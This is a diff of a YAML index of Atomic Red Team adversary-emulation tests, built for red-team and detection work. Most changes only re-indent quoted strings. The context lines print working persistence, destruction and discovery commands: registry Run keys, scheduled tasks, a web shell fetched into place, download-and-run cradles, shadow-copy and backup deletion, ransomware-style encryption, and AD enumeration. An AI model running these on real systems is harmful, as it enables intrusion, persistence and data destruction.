+          '
         prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
 
-'
+          '
       executor:
         command: |
           Add-Content #{ps_profile} -Value ""
@@ -44484,14 +44484,14 @@ persistence:
         command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello
           World"'' >> /etc/rc.common
 
-'
+          '
         elevation_required: true
         name: bash
     - name: rc.common
       auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
       description: 'Modify rc.common
 
-'
+        '
       supported_platforms:
       - linux
       executor:
@@ -44507,12 +44507,12 @@ persistence:
           ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
           && sudo rm $origfilename;fi
 
-'
+          '
     - name: rc.local
       auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
       description: 'Modify rc.local
 
-'
+        '
       supported_platforms:
       - linux
       executor:
@@ -44528,7 +44528,7 @@ persistence:
           ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
           sudo rm $origfilename;fi
 
-'
+          '
   T1542.004:
     technique:
       created: '2020-10-20T00:05:48.790Z'
@@ -44654,10 +44654,10 @@ persistence:
       executor:
         command: 'sudo defaults write com.apple.loginwindow LoginHook #{script}
 
-'
+          '
         cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook
 
-'
+          '
         elevation_required: true
         name: sh
   T1108:
@@ -44852,11 +44852,11 @@ persistence:
         command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
           "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
 
-'
+          '
         cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
           /V "Atomic Red Team" /f >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Reg Key RunOnce
       auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
@@ -44874,11 +44874,11 @@ persistence:
         command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
           /v 1 /d "#{thing_to_execute}"
 
-'
+          '
         cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
           /v 1 /f >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: PowerShell Registry RunOnce
@@ -44904,7 +44904,7 @@ persistence:
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Suspicious vbs file run from startup Folder
@@ -45125,10 +45125,10 @@ persistence:
           ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys;
           fi;
 
-'
+          '
         cleanup_command: 'unset ssh_authorized_keys
 
-'
+          '
   T1053.005:
     technique:
       created: '2019-11-27T14:58:00.429Z'
@@ -45226,7 +45226,7 @@ persistence:
       description: 'Upon successful execution, cmd.exe will create a scheduled task
         to spawn cmd.exe at 20:10.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -45243,10 +45243,10 @@ persistence:
         elevation_required: false
         command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
 
-'
+          '
         cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
 
-'
+          '
     - name: Scheduled task Remote
       auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
       description: |
@@ -45282,11 +45282,11 @@ persistence:
         command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
           "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 
-'
+          '
         cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
           /TN "Atomic task" /F >nul 2>&1
 
-'
+          '
     - name: Powershell Cmdlet Scheduled Task
       auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
       description: |
@@ -45308,7 +45308,7 @@ persistence:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
           >$null 2>&1
 
-'
+          '
     - name: Task Scheduler via VBA
       auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
       description: |
@@ -45325,7 +45325,7 @@ persistence:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -45336,7 +45336,7 @@ persistence:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -45349,7 +45349,7 @@ persistence:
         login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
         as Register-ScheduledTask cmdlet behind the scenes.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -45361,7 +45361,7 @@ persistence:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
           >$null 2>&1
 
-'
+          '
   T1053:
     technique:
       id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -45497,7 +45497,7 @@ persistence:
         sets it as the screensaver so it will execute for persistence. Requires a
         reboot and logon.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -45807,7 +45807,7 @@ persistence:
       description: 'Change Service registry ImagePath of a bengin service to a malicious
         file
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -45827,22 +45827,22 @@ persistence:
       dependencies:
       - description: 'The service must exist (#{weak_service_name})
 
-'
+          '
         prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
 
-'
+          '
       executor:
         command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
           /f /v ImagePath /d "#{malicious_service_path}"
 
-'
+          '
         cleanup_command: 'sc.exe delete #{weak_service_name}
 
-'
+          '
         name: command_prompt
   T1547.009:
     technique:
@@ -45915,7 +45915,7 @@ persistence:
           #{shortcut_file_path}
         cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Create shortcut to cmd in startup folders
       auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
@@ -46016,10 +46016,10 @@ persistence:
       executor:
         command: 'sudo touch /Library/StartupItems/EvilStartup.plist
 
-'
+          '
         cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
 
-'
+          '
         name: sh
         elevation_required: true
   T1542.001:
@@ -46196,7 +46196,7 @@ persistence:
       description: 'This test creates a Systemd service unit file and enables it as
         a service.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -46269,15 +46269,15 @@ persistence:
       dependencies:
       - description: 'System must be Ubuntu ,Kali OR CentOS.
 
-'
+          '
         prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
           /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
           ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
 
-'
+          '
         get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
 
-'
+          '
       executor:
         name: bash
         elevation_required: true
@@ -46714,13 +46714,13 @@ persistence:
       dependencies:
       - description: 'Microsoft Exchange SnapIn must be installed
 
-'
+          '
         prereq_command: 'Get-TransportAgent -TransportService FrontEnd
 
-'
+          '
         get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn
 
-'
+          '
       executor:
         command: |
           Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}
@@ -46932,7 +46932,7 @@ persistence:
       auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f
       description: 'Adds a command to the .bash_profile file of the current user
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -46944,13 +46944,13 @@ persistence:
       executor:
         command: 'echo "#{command_to_add}" >> ~/.bash_profile
 
-'
+          '
         name: sh
     - name: Add command to .bashrc
       auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
       description: 'Adds a command to the .bashrc file of the current user
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -46962,7 +46962,7 @@ persistence:
       executor:
         command: 'echo "#{command_to_add}" >> ~/.bashrc
 
-'
+          '
         name: sh
   T1078:
     technique:
@@ -47131,10 +47131,10 @@ persistence:
       dependencies:
       - description: 'Web shell must exist on disk at specified location (#{web_shells})
 
-'
+          '
         prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
@@ -47143,7 +47143,7 @@ persistence:
       executor:
         command: 'xcopy /I /Y #{web_shells} #{web_shell_path}
 
-'
+          '
         cleanup_command: |
           del #{web_shell_path}\b.jsp /q >nul 2>&1
           del #{web_shell_path}\tests.jsp /q >nul 2>&1
@@ -47416,10 +47416,10 @@ persistence:
       dependencies:
       - description: 'Service binary must exist on disk at specified location (#{binary_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -47452,10 +47452,10 @@ persistence:
       dependencies:
       - description: 'Service binary must exist on disk at specified location (#{binary_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -47551,11 +47551,11 @@ persistence:
         command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
           "Shell" "explorer.exe, #{binary_to_execute}" -Force
 
-'
+          '
         cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
           NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Winlogon Userinit Key Persistence - PowerShell
       auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
@@ -47574,11 +47574,11 @@ persistence:
         command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
           "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
 
-'
+          '
         cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
           NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Winlogon Notify Key Logon Persistence - PowerShell
       auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
@@ -47600,7 +47600,7 @@ persistence:
         cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
           -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
   T1547.013:
     technique:
@@ -47744,7 +47744,7 @@ impact:
           net.exe user #{user_account} #{new_password}
         cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Delete User - Windows
@@ -47752,7 +47752,7 @@ impact:
       description: 'Deletes a user account to prevent access. Upon execution, run
         the command "net user" to verify that the new "AtomicUser" account was deleted.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -47774,21 +47774,21 @@ impact:
       auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947
       description: 'This test will remove an account from the domain admins group
 
-'
+        '
       supported_platforms:
       - windows
       dependency_executor_name: powershell
       dependencies:
       - description: 'Requires the Active Directory module for powershell to be installed.
 
-'
+          '
         prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
           0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
 
-'
+          '
       input_arguments:
         super_user:
           description: Account used to run the execution command (must include domain).
@@ -48032,10 +48032,10 @@ impact:
       - description: 'Secure delete tool from Sysinternals must exist on disk at specified
           location (#{sdelete_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
           Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
@@ -48065,7 +48065,7 @@ impact:
       executor:
         command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
 
-'
+          '
         name: bash
   T1486:
     technique:
@@ -48145,7 +48145,7 @@ impact:
       auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765
       description: 'Uses gpg to encrypt a file
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -48169,10 +48169,10 @@ impact:
       dependencies:
       - description: 'Finds where gpg is located
 
-'
+          '
         prereq_command: 'which_gpg=`which gpg`
 
-'
+          '
         get_prereq_command: ''
       executor:
         name: bash
@@ -48180,15 +48180,15 @@ impact:
         command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd
           0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}
 
-'
+          '
         cleanup_command: 'rm #{encrypted_file_path}
 
-'
+          '
     - name: Encrypt files using 7z (Linux)
       auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad
       description: 'Uses 7z to encrypt a file
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -48208,10 +48208,10 @@ impact:
       dependencies:
       - description: 'Finds where 7z is located
 
-'
+          '
         prereq_command: 'which_7z=`which 7z`
 
-'
+          '
         get_prereq_command: ''
       executor:
         name: bash
@@ -48226,7 +48226,7 @@ impact:
         an inturruption authentication to target system. If root permissions are not
         available then attempts to encrypt data within user''s home directory.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -48253,7 +48253,7 @@ impact:
       - description: 'Finds where ccencrypt and ccdecrypt is located and copies input
           file
 
-'
+          '
         prereq_command: |
           which_ccencrypt=`which ccencrypt`
           which_ccdecrypt=`which ccdecrypt`
@@ -48267,14 +48267,14 @@ impact:
           #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command};
           fi
 
-'
+          '
         cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path};
           else cp #{cped_file_path} #{user_input_file_path}; fi \n"
     - name: Encrypt files using openssl (Linux)
       auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1
       description: 'Uses openssl to encrypt a file
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -48302,10 +48302,10 @@ impact:
       dependencies:
       - description: 'Finds where openssl is located
 
-'
+          '
         prereq_command: 'which_openssl=`which openssl`
 
-'
+          '
         get_prereq_command: ''
       executor:
         name: bash
@@ -48328,10 +48328,10 @@ impact:
         elevation_required: true
         command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
 
-'
+          '
         cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
 
-'
+          '
   T1565:
     technique:
       external_references:
@@ -48982,18 +48982,18 @@ impact:
       - description: 'Create volume shadow copy of C:\ . This prereq command only
           works on Windows Server or Windows 8.
 
-'
+          '
         prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found
           that satisfy the query.")) { exit 0 } else { exit 1 }
 
-'
+          '
         get_prereq_command: 'vssadmin.exe create shadow /for=c:
 
-'
+          '
       executor:
         command: 'vssadmin.exe delete shadows /all /quiet
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Windows - Delete Volume Shadow Copies via WMI
@@ -49006,7 +49006,7 @@ impact:
       executor:
         command: 'wmic.exe shadowcopy delete
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Windows - wbadmin Delete Windows Backup Catalog
@@ -49019,7 +49019,7 @@ impact:
       executor:
         command: 'wbadmin delete catalog -quiet
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Windows - Disable Windows Recovery Console Repair
@@ -49050,7 +49050,7 @@ impact:
       executor:
         command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Windows - Delete Backup Files
@@ -49064,7 +49064,7 @@ impact:
         command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
           c:\backup*.* c:\*.set c:\*.win c:\*.dsk
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Windows - wbadmin Delete systemstatebackup
@@ -49073,13 +49073,13 @@ impact:
         technique is used by numerous ransomware families. This may only be successful
         on server platforms that have Windows Backup enabled.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'wbadmin delete systemstatebackup -keepVersions:0
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1491.001:
@@ -49141,7 +49141,7 @@ impact:
       auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3
       description: 'Downloads an image from a URL and sets it as the desktop wallpaper.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -49508,7 +49508,7 @@ impact:
       executor:
         command: 'yes > /dev/null
 
-'
+          '
         name: bash
   T1565.003:
     technique:
@@ -49726,10 +49726,10 @@ impact:
       executor:
         command: 'sc.exe stop #{service_name}
 
-'
+          '
         cleanup_command: 'sc.exe start #{service_name} >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Windows - Stop service using net.exe
@@ -49748,10 +49748,10 @@ impact:
       executor:
         command: 'net.exe stop #{service_name}
 
-'
+          '
         cleanup_command: 'net.exe start #{service_name} >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Windows - Stop service by killing process
@@ -49771,7 +49771,7 @@ impact:
       executor:
         command: 'taskkill.exe /f /im #{process_name}
 
-'
+          '
         name: command_prompt
   T1565.001:
     technique:
@@ -49882,7 +49882,7 @@ impact:
       auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64
       description: 'This test shuts down a Windows system.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -49893,14 +49893,14 @@ impact:
       executor:
         command: 'shutdown /s /t #{timeout}
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Restart System - Windows
       auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302
       description: 'This test restarts a Windows system.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -49911,14 +49911,14 @@ impact:
       executor:
         command: 'shutdown /r /t #{timeout}
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Restart System via `shutdown` - macOS/Linux
       auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb
       description: 'This test restarts a macOS/Linux system.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -49930,14 +49930,14 @@ impact:
       executor:
         command: 'shutdown -r #{timeout}
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Shutdown System via `shutdown` - macOS/Linux
       auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de
       description: 'This test shuts down a macOS/Linux system using a halt.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -49949,73 +49949,73 @@ impact:
       executor:
         command: 'shutdown -h #{timeout}
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Restart System via `reboot` - macOS/Linux
       auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027
       description: 'This test restarts a macOS/Linux system via `reboot`.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
       executor:
         command: 'reboot
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Shutdown System via `halt` - Linux
       auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd
       description: 'This test shuts down a Linux system using `halt`.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'halt -p
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Reboot System via `halt` - Linux
       auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e
       description: 'This test restarts a Linux system using `halt`.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'halt --reboot
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Shutdown System via `poweroff` - Linux
       auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa
       description: 'This test shuts down a Linux system using `poweroff`.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'poweroff
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Reboot System via `poweroff` - Linux
       auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41
       description: 'This test restarts a Linux system using `poweroff`.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
         command: 'poweroff --reboot
 
-'
+          '
         name: bash
         elevation_required: true
   T1565.002:
@@ -50186,10 +50186,10 @@ discovery:
       dependencies:
       - description: 'T1010.cs must exist on disk at specified location (#{input_source_code})
 
-'
+          '
         prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
@@ -50199,7 +50199,7 @@ discovery:
           #{output_file_name}
         cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1
 
-'
+          '
         name: command_prompt
   T1217:
     technique:
@@ -50249,7 +50249,7 @@ discovery:
       description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
         that contains bookmarks and lists any found instances to a text file.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -50263,14 +50263,14 @@ discovery:
           cat #{output_file} 2>/dev/null
         cleanup_command: 'rm -f #{output_file} 2>/dev/null
 
-'
+          '
         name: sh
     - name: List Mozilla Firefox Bookmark Database Files on macOS
       auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b
       description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
         that contains bookmarks and lists any found instances to a text file.
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -50284,14 +50284,14 @@ discovery:
           cat #{output_file} 2>/dev/null
         cleanup_command: 'rm -f #{output_file} 2>/dev/null
 
-'
+          '
         name: sh
     - name: List Google Chrome Bookmark JSON Files on macOS
       auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc
       description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains
         bookmarks in JSON format and lists any found instances to a text file.
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -50305,7 +50305,7 @@ discovery:
           cat #{output_file} 2>/dev/null
         cleanup_command: 'rm -f #{output_file} 2>/dev/null
 
-'
+          '
         name: sh
     - name: List Google Chrome Bookmarks on Windows with powershell
       auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545
@@ -50318,7 +50318,7 @@ discovery:
         command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction
           SilentlyContinue -Force
 
-'
+          '
         name: powershell
     - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt
       auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5
@@ -50330,7 +50330,7 @@ discovery:
       executor:
         command: 'where /R C:\Users\ Bookmarks
 
-'
+          '
         name: command_prompt
     - name: List Mozilla Firefox bookmarks on Windows with command prompt
       auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5
@@ -50342,7 +50342,7 @@ discovery:
       executor:
         command: 'where /R C:\Users\ places.sqlite
 
-'
+          '
         name: command_prompt
     - name: List Internet Explorer Bookmarks using the command prompt
       auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85
@@ -50353,7 +50353,7 @@ discovery:
       executor:
         command: 'dir /s /b %USERPROFILE%\Favorites
 
-'
+          '
         name: command_prompt
   T1087.004:
     technique:
@@ -50800,7 +50800,7 @@ discovery:
       description: 'Enumerate all accounts via PowerShell. Upon execution, lots of
         user account and group information will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -50814,7 +50814,7 @@ discovery:
       description: 'Enumerate logged on users. Upon exeuction, logged on users will
         be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -50825,7 +50825,7 @@ discovery:
       executor:
         command: 'query user /SERVER:#{computer_name}
 
-'
+          '
         name: command_prompt
     - name: Automated AD Recon (ADRecon)
       auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59
@@ -50843,18 +50843,18 @@ discovery:
       dependencies:
       - description: 'ADRecon must exist on disk at specified location (#{adrecon_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1"
           -OutFile #{adrecon_path}
 
-'
+          '
       executor:
         command: 'Invoke-Expression #{adrecon_path}
 
-'
+          '
         cleanup_command: |
           Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null
           Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
@@ -50875,14 +50875,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-'
+          '
       executor:
         command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
           lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -50904,14 +50904,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-'
+          '
       executor:
         command: "#{adfind_path} -sc admincountdmp\n"
         name: command_prompt
@@ -50931,14 +50931,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-'
+          '
       executor:
         command: "#{adfind_path} -f (objectcategory=person)\n"
         name: command_prompt
@@ -50958,14 +50958,14 @@ discovery:
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
           -OutFile #{adfind_path}
 
-'
+          '
       executor:
         command: "#{adfind_path} -sc exchaddresses\n"
         name: command_prompt
@@ -50974,13 +50974,13 @@ discovery:
       description: 'This test will enumerate the details of the built-in domain admin
         account
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'net user administrator /domain
 
-'
+          '
         name: command_prompt
     - name: Enumerate Active Directory for Unconstrained Delegation
       auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
@@ -51003,7 +51003,7 @@ discovery:
       dependencies:
       - description: 'PowerShell ActiveDirectory Module must be installed
 
-'
+          '
         prereq_command: |
           Try {
               Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
@@ -51024,7 +51024,7 @@ discovery:
         command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
           -Server #{domain}
 
-'
+          '
   T1069.002:
     technique:
       external_references:
@@ -51092,7 +51092,7 @@ discovery:
       executor:
         command: 'get-ADPrincipalGroupMembership #{user} | select name
 
-'
+          '
         name: powershell
     - name: Elevated group enumeration using net group (Domain)
       auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37
@@ -51114,7 +51114,7 @@ discovery:
         execution, progress and info about each host in the domain being scanned will
         be displayed.
 
-'
+        '
       supported_platforms:
       - windows
